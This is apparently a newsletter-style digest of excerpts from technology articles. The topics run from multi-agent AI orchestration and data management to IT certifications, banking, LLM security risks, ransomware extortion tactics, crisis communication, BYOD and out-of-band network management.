Quote for the day:
“Don't blow off another's candle for it
won't make yours shine brighter.” -- Jaachynma N.E. Agu

It’s no longer just about building a single, super-smart model. The real power,
and the exciting frontier, lies in getting multiple specialized AI agents to
work together. Think of them as a team of expert colleagues, each with their own
skills — one analyzes data, another interacts with customers, a third manages
logistics, and so on. Getting this team to collaborate seamlessly, as envisioned
by various industry discussions and enabled by modern platforms, is where the
magic happens. But let’s be real: Coordinating a bunch of independent, sometimes
quirky, AI agents is hard. It’s not just building cool individual agents; it’s
the messy middle bit — the orchestration — that can make or break the system.
When you have agents that are relying on each other, acting asynchronously and
potentially failing independently, you’re not just building software; you’re
conducting a complex orchestra. This is where solid architectural blueprints
come in. We need patterns designed for reliability and scale right from the
start. ... For agents to collaborate effectively, they often need a shared view
of the world, or at least the parts relevant to their task. This could be the
current status of a customer order, a shared knowledge base of product
information or the collective progress towards a goal. Keeping this “collective
brain” consistent and accessible across distributed agents is tough.

"Unlike traditional databases, which define the schema -- the data's structure
-- before it's stored, schema-on-read defers this process until the data is
actually read or queried," says Kamal Hathi, senior vice president and general
manager of machine-generated data monitoring and analysis software firm at
Splunk, a Cisco company. This approach is particularly effective for
unstructured and semi-structured data, where the schema is not predefined or
rigid, Hathi says. "Traditional databases require a predefined schema, which
makes working with unstructured data challenging and less flexible." ... Manage
unstructured data by integrating it with structured data in a cloud environment
using metadata tagging and AI-driven classifications, suggests Cam Ogden, a
senior vice president at data integrity firm Precisely. "Traditionally,
structured data -- like customer databases or financial records -- reside in
well-organized systems such as relational databases or data warehouses," he
says. However, to fully leverage all of their data, organizations need to break
down the silos that separate structured data from other forms of data, including
unstructured data such as text, images, or log files. This is where the cloud
comes into play. Integrating structured and unstructured data in the cloud
allows for more comprehensive analytics, enabling organizations to extract
deeper insights from previously siloed information, Ogden says.

The reasons are manifold. Inflation has eroded buying power, traditional
merit-based raises have declined, bonuses are scarcer and 2024 saw a sharp
uptick in layoffs - particularly targeting middle management and older
professionals. Unlike the "Great Resignation" of 2021, professionals today are
staying put - not from loyalty but from caution, and upskilling is the key to
ensure their longevity. Faced with a precarious job market and declining
benefits, many IT employees are opting for stability and doubling down on
internal mobility. According to the Pearson VUE's 2025 Value of IT Certification
Candidate Report, more than 80% of the respondents who hold at least one
certification said it enhanced their ability to innovate and 70% said they
experienced greater autonomy at workplace. Even in regions where pay bumps are
smaller, the career mobility afforded by certifications is prevalent. In India,
for instance, CloudThat's IT Certifications and Salary Survey found that
Microsoft-certified professionals earn an average entry salary of $10,900, with
60% of certified workers reporting pay hikes. "The increased value in
certifications underscore their critical role in equipping professionals with
the skills needed to excel and advance in their roles. As the industry continues
to grow, certifications are becoming essential to stand out and meet the demand
for specialized skills," said Bhavesh Goswami, founder and CEO of CloudThat.
To expedite digitalisation, global policymakers are introducing regulations such
as India’s Digital Banking Units (DBUs), the EU’s PSD2/PSD3 directives, and the
GCC’s open finance guidelines. The growth in non-bank financial intermediaries
(NBFIs), which has been both more intricate and wider in scope, in the most
recent years, obliges the employing of more effective compliance frameworks and
the introduction of better risk management strategies. ... Integrating banking
directly into non-financial platforms such as e-commerce is on the rise. Based
on a report by Grand View Research, the global Banking-as-a-Service (BaaS)
market is expected to reach USD 66 billion by 2030. Retailers increasingly
partner with banks for instant, personalised offers and payments via identity
beacons, enhancing customer experiences through Gen AI-supported interactions.
For example, real-time data analytics and machine learning models are now
essential for personalised financial services. Reimagined branch visits are
becoming an emerging trend, with branches shifting to high-footfall locations
like malls. The store-like experience includes personalised offers and decision
aids, including immediate approval for flexible loans, made possible by customer
identification based on consent.

The convergence of AI with existing systems has brought technical debt into
sharp focus. While AI, and agentic AI in particular, presents transformative
opportunities, it also exposes the limitations of legacy systems and
architectural decisions made in the past. It’s essential to balance the
excitement of AI adoption with the pragmatic need to address underlying
technical debt, as we explored in our recent research. ... While AI enthusiasm
runs high, successful implementation requires careful focus on use cases that
deliver tangible business value. CIOs must lead their organizations in
identifying and executing AI initiatives that drive meaningful outcomes. That
means defining AI programs with an holistic, end-to-end vision of how they’ll
deliver value for your business. And it means taking a platform approach, as
opposed to numerous isolated PoCs. ... The traditional boundaries of IT are
dissolving. With technology now fundamentally driving business strategy, CIOs
must lead the evolution from an IT operating model to a new business
technology operating model. Recent data shows organizations that have embraced
this transformation achieved 15% higher top-line performance compared to their
peers, with potential for this gap to double by next year.

One particularly concerning area is the use of LLMs in coding applications.
“Coding agents that rely on LLM-generated code may inadvertently introduce
security vulnerabilities into production systems,” Chennabasappa warned.
“Misaligned multi-step reasoning can also cause agents to perform operations
that stray far beyond the user’s original intent.” These types of risks are
already surfacing in coding copilots and autonomous research agents, she added,
and are only likely to grow as agentic systems become more common. Yet while
LLMs are being embedded deeper into mission-critical workflows, the surrounding
security infrastructure hasn’t kept pace. “Security infrastructure for LLM-based
systems is still in its infancy,” Chennabasappa said. “So far, the industry’s
focus has been mostly limited to content moderation guardrails meant to prevent
chatbots from generating misinformation or abusive content.” That approach, she
argued, is far too narrow. It overlooks deeper, more systemic threats like
prompt injection, insecure code generation, and abuse of code interpreter
capabilities. Even proprietary safety systems that hardcode rules into model
inference APIs fall short, according to Chennabasappa, because they lack the
transparency, auditability, and flexibility needed to secure increasingly
complex AI applications.

In double extortion attacks, a second layer is added: attackers, having gained
access to the system, exfiltrate sensitive and valuable data. This not only
deepens the victim’s vulnerability but also increases pressure, as attackers now
hold both encrypted files and stolen information, which they can use as leverage
for further demands. The threat of double extortion becomes more severe as it
combines operational disruption (due to encrypted data and downtime) with the
risk of public exposure. Organizations unable to access their data face halted
services, financial loss, and reputational damage. ... Triple extortion expands
upon traditional and double extortion ransomware tactics by introducing a third
layer of pressure. The attack begins with data encryption and exfiltration,
similar to the double extortion model—locking the victim out of their data while
simultaneously stealing sensitive information. This stolen data gives attackers
multiple avenues to exploit the victim, who is left with no control over its
fate. The third stage involves third-party extortion. After collecting data from
the primary victim, attackers identify and target affiliated parties, such as
partners, clients, and stakeholders, whose information was also
compromised.

Your first move shouldn’t be panic-fixing everything in silence, Young says.
“You need to let people know what’s going on, including your team, your
leadership, and sometimes even your customers.” Keeping everyone in the loop
calms nerves and builds trust. Silence makes everything worse, Young warns. ...
Confusion is contagious. “Providing clarity about what’s known, what matters,
and what you’re aiming for, stabilizes people and systems,” says Leila Rao, a
workplace and executive coaching consultant. “It sets the tone for proactivity
instead of reactivity.” Simply treating symptoms will make the problem worse,
Rao warns. “Misinformation spreads, trust erodes, and well-intentioned responses
become counterproductive.” Crisis is complexity on steroids, Rao observes. “When
we center people, welcome multiple perspectives, and make space for emergence,
we move from crisis management to collective learning.” ... You can’t hide from
a crisis, and attempting to do so only compounds the damage, Hasmukh warns.
“Clear visibility into what happened allows you to respond effectively and
maintain stakeholder trust during challenging times.” Organizations that delay
acknowledging issues inevitably face greater scrutiny and damage than those that
address situations head-on.

The data is clear that there can be significant gains in productivity attached
to BYOD. Samsung estimates that workers using their own devices can gain about
an hour of productive worktime per day and Cybersecurity Insiders says that 68%
of businesses see some degree of productivity increases. Although the gains are
significant, personal devices can also distract workers more than company-owned
devices, with personal notifications, social media accounts, news, and games
being the major time-sink culprits. This has the potential to be a real issue,
as these apps can become addictive and their use compulsive. ... One challenge
for BYOD has always been user support and education. With two generations of
digital natives now comprsing more than half the workforce, support and
education needs have changed. Both millennials and Gen Z have grown up with the
internet and mobile devices, which makes them more comfortable making technology
decisions and troubleshooting problems than baby boomers and Gen X. This doesn’t
mean that they don’t need tech support, but they do tend to need less
hand-holding and don’t instinctively reach for the phone to access that support.
Thus, there’s an ongoing shift to self-support resources and other, less
time-intensive, models with text chat being the most common — be it with a
person or a bot.
In-band management uses the same data path as production traffic to manage the
customer environment, while logically isolating management traffic from
production data. Although this approach can be more cost-effective, it
introduces certain risks. If a problem occurs with the production network, it
can also disrupt management access to the infrastructure, a situation referred
to as “fate sharing.” In these cases, the only viable solution may be to send an
engineer onsite to diagnose and resolve the issue. This can result in
significant costs and delays, potentially impacting the customer’s business
operations. Out-of-band management, on the other hand, uses a separate network
to provide independent access for managing the infrastructure, completely
isolating management traffic from the production network. This separation is
crucial during major disruptions like provider outages or security breaches, as
it guarantees continuous access to network devices and servers, even if the
primary production network is down or compromised. ... A secure connection links
this cloud infrastructure to the customer’s on-premises IT setup, usually
through a dedicated private network connection, SD-WAN, or an IPSEC VPN. This
connection typically terminates at an on-premises router or firewall,
safeguarding access to the out-of-band management network.